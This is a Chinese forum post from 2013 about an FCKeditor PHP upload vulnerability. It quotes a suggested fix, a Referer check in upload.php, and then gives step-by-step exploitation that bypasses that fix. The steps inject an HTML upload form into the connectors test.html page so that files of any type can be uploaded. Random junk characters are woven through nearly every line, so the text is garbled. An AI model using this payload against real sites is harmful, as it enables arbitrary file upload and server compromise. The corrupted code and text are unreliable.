漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php& }4 _% R, v$ Q8 T' X# w/ f6 @
网上给出的修复方案是
7 G9 t( C; n* ^+ b; Y修复方法,删除FCK编辑器用其他的编辑器( ?1 V( K# }, [- c
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
2 h1 z" v( s& y% M" V9 b) W在
9 Q& U0 Q( E. t7 o. m* a4 B, x: X9 rrequire(‘config.php’);, j5 c) Q9 q3 E; t* p
require(‘util.php’);
" R4 E; Y; J1 H5 l1 P& j' C0 ~) X的下面添加以下代码—————————–
) E3 ?' G, v+ w5 {4 j& E+ Q" Y; H//防止外部提交0 X( @0 X- x! x0 d7 E. B0 n5 O+ L
function outsidepost() P. f. i3 f) z
{. F4 S: S% W* g' s
$servername=$_SERVER['SERVER_NAME'];' n* w9 F7 n- y- `" n; s; ~- c% _
$sub_from=@$_SERVER['HTTP_REFERER'];3 T$ U4 L4 w# G" I1 s
$sub_len=strlen($servername); e& N& F: M" h1 G
$checkfrom=substr($sub_from,7,$sub_len);( Y8 w/ K) k7 _0 f
if($checkfrom!=$servername){
+ w- t# A2 m# W; [& iecho(“you don’t outsidepost!”);
* [6 L% N% E, v: f2 T% |9 M, Mexit;) n) `) [- n: k$ X- [; ?4 P
}5 R1 p1 e4 i# i% t' v/ M0 S
}
+ F8 L6 O' o" ?0 \3 Y$ t7 Routsidepost();, ^* d8 T$ ^: D% V0 G
防止外部提交,但是没有防止内部提交,9 l! X3 r6 ^( \0 g/ | _2 O
利用方法:; R6 J+ S; ^5 [7 i9 r
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html4 [% p6 e$ ^: _/ \6 E* o
2,在Current Folder 框输入
4 O- f/ C+ k6 t7 y) [<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
% [* m- \8 [ |然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
4 Z/ N+ T, X6 u/ qPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对